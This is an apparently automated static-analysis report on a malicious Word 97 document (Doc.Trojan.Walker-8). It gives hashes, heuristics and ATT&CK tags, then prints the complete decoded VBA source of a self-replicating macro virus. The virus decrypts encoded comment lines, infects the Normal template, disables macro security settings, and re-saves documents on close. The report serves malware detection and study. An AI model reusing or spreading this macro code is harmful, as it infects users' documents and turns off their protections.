Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 876b5b0e2cee0b28…

MALICIOUS

Office (OLE)

33.5 KB Created: 2000-02-02 05:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d6abe74ad6042ad0486f7bca84100e01 SHA-1: d500603e7b5a9aa68e6b56339dca1296997fb0f1 SHA-256: 876b5b0e2cee0b28b8a6912d2948fd97628076799f679f7a84436b171955271b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious Office documents. The DOC BODY explicitly states 'I am infected with W97M.Junk.A', indicating a social engineering lure to encourage macro execution. The presence of VBA macros and the Document_Open event strongly suggests an attempt to execute malicious code upon opening the document, likely to download or execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Walker-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Walker-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10862 bytes
SHA-256: 15a7b6bbf8531e3d32c8ec2fa8c44448447dea35bedef2e71e4ba710c6eb6e30
Detection
ClamAV: Doc.Trojan.Walker-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function Heidi(WhereAmI As String)
'[Bench]Garbage v2.0
'----------------------------------------
'Po!Fssps!Sftvnf!Ofyu;!B`Zvq!>!Gbmtf;!O`Zvq!>!Gbmtf;!Bqqmjdbujpo/Pqujpot/DpogjsnDpowfstjpot!>!Gbmtf
'HkpfMg{*DwknfMg{Eqfg*yfMg{H33."yfMg{Cnv++0Fkucdng<"HkpfMg{*DwknfMg{Eqfg*yfMg{H:."yfMg{Cnv++0Fkucdng
'Zlwk#FrppdqgEduv+%Wrrov%,=#1Frqwurov+%Pdfur%,1Hqdeohg#@#3=#1Frqwurov+%Fxvwrpl}h111%,1Hqdeohg#@#3=#1Frqwurov+%Whpsodwhv#dqg#Dgg0Lqv111%,1Hqdeohg#@#3=#Hqg#Zlwk
'GsqqerhFevw,&Jsvqex&-2Gsrxvspw,&Wx}pi222&-2Irefpih$A$4>$GsqqerhFevw,&Zmi{&-2Gsrxvspw,&Xsspfevw&-2Irefpih$A$4
'X~xyjr3Uwn{fyjUwtknqjXywnsl-''1%'MPJ^dHZWWJSYdZXJWaXtky|fwjaRnhwtxtkyaTkknhja>35a\twiaXjhzwny~'1%'Qj{jq'.%B%6+
'Ol&Gvvroigzout4\kxyout&DC&?)&Znkt&IussgtjHgxy.(Sgixu(/4Iutzxury.(Yki{xoz 444(/4Jkrkzk&Kryk
'^p{o'Hwwspjh{pvu5Vw{pvuzA'5]py|zWyv{lj{pvu'D'7A'5Zh}lUvythsWyvtw{'D'7A'Luk'^p{o
'[m|(IL(E(Ik|q~mLwk}umv|6^JXzwrmk|6^JKwuxwvmv|{6Q|mu0916KwlmUwl}tmB([m|(V\(E(Vwzuit\muxti|m6^JXzwrmk|6^JKwuxwvmv|{6Q|mu0916KwlmUwl}tm
'JR)F)JM7urwn|1;5):2C)WR)F)W]7urwn|1;5):2
'Sp*KS*G*,1eLoxmrgQk|lkqo*€<8:,*^rox*Kic z*G*^| oD*Sp*XS*G*,1eLoxmrgQk|lkqo*€<8:,*^rox*Xic z*G*^| o
'Tq+Ljd€{+H+_}€p+Lyo+Yjd€{+H+_}€p+_spy+Pƒt +Q€yn tzy
'Ur,ctq~qMyU,I,.`qy|xm€q.,`tqzF,_q€,Om~~uq~,I,Z`F,_q€,t{ €,I,MPF,Qx qF,_q€,Om~~uq~,I,MPF,_q€,t{ €,I,Z`
'Tr{rP|qr-J-Pn  vr ;yv{r€5>9-Pn  vr ;P|‚{�\sYv{r€6
'Xjui!iptu;!/EfmfufMjoft!2-!/DpvouPgMjoft;!/JotfsuMjoft!2-!HfofDpef;!Foe!Xjui
'------------------------------------------
'------------------------------------------
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'-----------------------------------------
'-----------------------------------------
End Function
Private Function encrypt(a, b As Integer)
On Error Resume Next
Dim c: c = "": For d = 1 To Len(a): c = c + Chr((Asc(Mid$(a, d, 1))) - b): Next
encrypt = c
End Function
Private Sub Document_Open()
On Error Resume Next:
If MacroContainer = NormalTemplate Then: WhereAmI = "Template": Set host = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule: Else: WhereAmI = "Document": Set host = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
With host
    For x = 4 To 17
    If y = 13 Then y = 0
    crypt = .lines(x, 1): y = y + 1: l = Len(crypt): l = l - 1: crypt = Right$(crypt, l): .replaceline x + 16, encrypt(crypt, (y))
    Next x
End With
Heidi (WhereAmI)
Set host = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
With host: For x = 20 To 33: .replaceline x, "'": Next x: End With
End Sub
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
If Left$(ActiveDocument.Name, 8) <> "Document" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf Left$(ActiveDocument.Name, 8) = "Document" And ActiveDocument.Characters.Count = 0 Then
ActiveDocument.Saved = True: End If
Set host = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
With host: For x = 20 To 33: .replaceline x, "'": Next x: End With
Application.ScreenUpdating = True
End Sub

' By [Bench] - Thanks go to The Weird Genius for the encryption idea


' Processing file: /opt/analyzer/scan_staging/b67af82a46794adfa8cba73b60c252ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8402 bytes
' Line #0:
' 	FuncDefn (Private Function Heidi(WhereAmI As String, id_FFFE As Variant))
' Line #1:
' 	QuoteRem 0x0000 0x0013 "[Bench]Garbage v2.0"
' Line #2:
' 	QuoteRem 0x0000 0x0028 "----------------------------------------"
' Line #3:
' 	QuoteRem 0x0000 0x0062 "Po!Fssps!Sftvnf!Ofyu;!B`Zvq!>!Gbmtf;!O`Zvq!>!Gbmtf;!Bqqmjdbujpo/Pqujpot/DpogjsnDpowfstjpot!>!Gbmtf"
' Line #4:
' 	QuoteRem 0x0000 0x0063 "HkpfMg{*DwknfMg{Eqfg*yfMg{H33."yfMg{Cnv++0Fkucdng<"HkpfMg{*DwknfMg{Eqfg*yfMg{H:."yfMg{Cnv++0Fkucdng"
' Line #5:
' 	QuoteRem 0x0000 0
... (truncated)